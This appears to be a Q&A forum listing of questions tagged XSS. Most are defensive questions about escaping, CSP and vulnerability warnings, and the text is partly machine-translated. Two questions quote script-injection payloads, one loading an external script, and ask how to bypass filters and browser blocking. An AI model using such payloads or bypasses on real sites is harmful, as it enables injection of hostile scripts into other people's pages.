Questions tagged [XSS] (60)

3
answers

How to replace the script?

Previously used so "><script scr=http://site.com/script.js></script> but now the website did the filter and removes the script from the website address how can I replace script ? that would have worked just XSS
Rosendo_Legr asked April 4th 20 at 13:39
0
answer

How to install the script XSSer in PentestBox?

Hi all. In Python I'm a little more than I'm not good please suggest, what I do wrong. Error:Traceback (most recent call last): File "C:\PentestBox\bin\customtools\webApplications\xsser\xsser\setup.py", line 32, in <module> for afile in os.listdir('doc'): WindowsError: [Error 3] : 'doc/*.*' The file itself is here h...
Elvie asked March 24th 20 at 13:16
0
answer

What kind of screens request.form.to_dict()?

Hello! There is a piece of code where the data taken from the forms and entered into a database. At this stage there is some adaptation of the html tags. I would like to know in what form to store such strings in the database.cv_firstname = request.form.get('firstname') cv_lastname = request.form.get('lastname') cv_email ...
lisa asked March 19th 20 at 09:25
2
answers

How to know if my Wordpress site is does not contain xss vulnerabilities?

I'm a noob. Received from hosting company a warning about that file: /home/мойсайт/public_html/wp-includes/formatting.php /home/мойсайт/public_html/wp-includes/comment.php /home/мойсайт/public_html/wp-admin/includes/ajax-actions.php ...discovered XSS vulnerability. Current WP version 4.8.8 The panel proposes to update WP t...
Aisha.Schaefer54 asked March 18th 20 at 21:57
1
answer

Protection against XSS through escaping?

There is a website in php, slopes How to better protect themselves from XSS? If, for example, when adding data to the database, to escape the special characters (mostly <, >, $, %, &, ' and ") with htmlspecialchars, if it helps to avoid xss?
paxton_Ledner39 asked March 16th 20 at 13:23
1
answer

Sql and xss if I understand correctly?

1) Enter information into the database using PDO to prepare the query, bind the variables with type and execute, if the input data is not possible and query. If id, let's say the article is transmitted via GET request, you need to cast it to integer $sth->bindValue(1, (int) $id, PDO::PARAM_INT); If input, for example, th...
jennyfer_Barton asked March 15th 20 at 22:59
2
answers

How to find a string (contains XSS) or not?

Hello. How do I know, dangerous string or not? I tried to process a string HTMLPurifier'ohms and then compare its length with a raw string. If the length is different, then HTMLPurifier removed dangerous elements from this line (tags, attributes). So, the line was dangerous. But it's not working. Because HTMLPurifier built ...
ora_Romague asked March 13th 20 at 11:03
2
answers

The browser prevents the transfer of the link with the XSS. How to bypass the lock?

Hi all. I recently found a website vulnerable to xss, I'm not strong, but on "/><""/><script>alert("admin, remove xss!")script> my brain enough... So. Introduced in the field of on-site search, working. Of course, reported it to support. Although something tells me that they don't even read.... Because th...
avis_Co asked March 12th 20 at 16:41
1
answer

Will work correctly 2 Content-Security-Policy header?

I have an app that does server-side rendering. In addition. it proximedia using nginx. I did configure the CSP with nginx, but the problem is that the app (or rather framework) ijacket your scripts in the layout, so I need to use a hash, which can provide only app. I set the CSP header in the application (regarding the scri...
lupe.Hilll asked March 11th 20 at 23:18
3
answers

Is it safe to insert JSON in HTML

Is it safe to insert JSON strings received from the user, directly in the page via a script tag? Whether it is through special html sequences to break the JSON, making a XSS? The JSON is generated by PHP function json_encode. Example. $queryData = json_encode(array('query' => isset($_GET['query']) ? $_GET['query'] : ",...
Tyshawn11 asked October 10th 19 at 06:15